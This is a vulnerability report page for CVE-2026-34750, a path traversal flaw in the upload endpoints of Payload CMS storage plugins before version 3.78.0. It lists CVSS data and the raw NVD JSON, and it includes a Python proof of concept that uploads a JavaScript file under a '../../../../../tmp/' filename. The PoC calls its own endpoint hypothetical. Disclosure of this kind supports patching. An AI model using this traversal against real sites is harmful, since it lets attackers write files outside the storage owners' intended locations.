Security Vulnerability Report
CVE-2026-34750 CVSS 6.5 MEDIUM

CVE-2026-34750

Published: 2026-04-01 20:16:27
Last Modified: 2026-04-13 19:15:38

Description

Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3, the client-upload signed-URL endpoints for S3, GCS, Azure, and R2 did not properly sanitize filenames. An attacker could craft filenames to escape the intended storage location. This issue has been patched in version 3.78.0 for @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE
@payloadcms/storage-azure < 3.78.0
@payloadcms/storage-gcs < 3.78.0
@payloadcms/storage-r2 < 3.78.0
@payloadcms/storage-s3 < 3.78.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# This POC demonstrates the concept of the vulnerability.
# It attempts to upload a file with a path traversal payload.
# Target Payload CMS instance with vulnerable storage plugin.
target_url = "https://example.com/api/upload/generate-upload-url"

# Attacker controlled filename with path traversal
malicious_filename = "../../../../../tmp/malicious_payload.js"
payload_content = "console.log('Vulnerable to CVE-2026-34750');"

# Headers simulating a low-privilege authenticated user
headers = {
    "Authorization": "Bearer <LOW_PRIV_TOKEN>",
    "Content-Type": "application/json",
}

# Step 1: Request the signed URL (hypothetical endpoint)
data = {
    "filename": malicious_filename,
    "mimeType": "application/javascript",
}

try:
    # Response usually contains a 'url' and 'fields' for S3 or similar
    response = requests.post(target_url, json=data, headers=headers)
    if response.status_code == 200:
        upload_data = response.json()
        print("[+] Signed URL obtained successfully.")

        # Step 2: Upload the file using the signed URL
        # Note: The actual upload mechanism depends on the cloud provider
        # (S3 form POST, PUT, etc.)
        # Here we simulate a PUT request common in S3 uploads
        upload_url = upload_data.get("url")
        upload_response = requests.put(upload_url, data=payload_content)
        if upload_response.status_code == 200:
            print(f"[+] Exploit successful! File '{malicious_filename}' uploaded outside intended directory.")
        else:
            print(f"[-] Upload failed. Status: {upload_response.status_code}")
    else:
        print(f"[-] Failed to get signed URL. Status: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

https://github.com/payloadcms/payload/security/advisories/GHSA-frq9-7j6g-v74x (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34750",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T20:16:27.337",
    "lastModified": "2026-04-13T19:15:38.330",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3, the client-upload signed-URL endpoints for S3, GCS, Azure, and R2 did not properly sanitize filenames. An attacker could craft filenames to escape the intended storage location. This issue has been patched in version 3.78.0 for @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "3.78.0",
                "matchCriteriaId": "225E9788-C205-479C-B3EE-7A57A468929F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/payloadcms/payload/security/advisories/GHSA-frq9-7j6g-v74x",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory",
          "Mitigation"
        ]
      }
    ]
  }
}